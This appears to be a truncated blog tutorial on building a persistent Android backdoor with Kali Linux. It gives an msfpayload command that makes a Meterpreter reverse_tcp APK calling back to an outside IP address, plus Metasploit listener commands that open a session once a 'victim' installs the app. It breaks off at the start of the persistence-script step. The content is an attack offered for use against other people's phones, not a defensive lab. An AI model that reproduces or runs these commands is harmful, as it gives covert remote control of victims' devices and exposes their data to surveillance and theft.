How To Create A Persistent BackDoor In Android Using Kali Linux
How to make the Backdoor Persistent: In this tutorial I am going to show you how to make the back door we created in my guide here a persistent one. I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites. Step 1 Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I'll be hacking on WAN Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4 exploit After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up... Step 2 Create a Persistent Script: Here.. Copy these commands in a notepad to
Comments
Post a Comment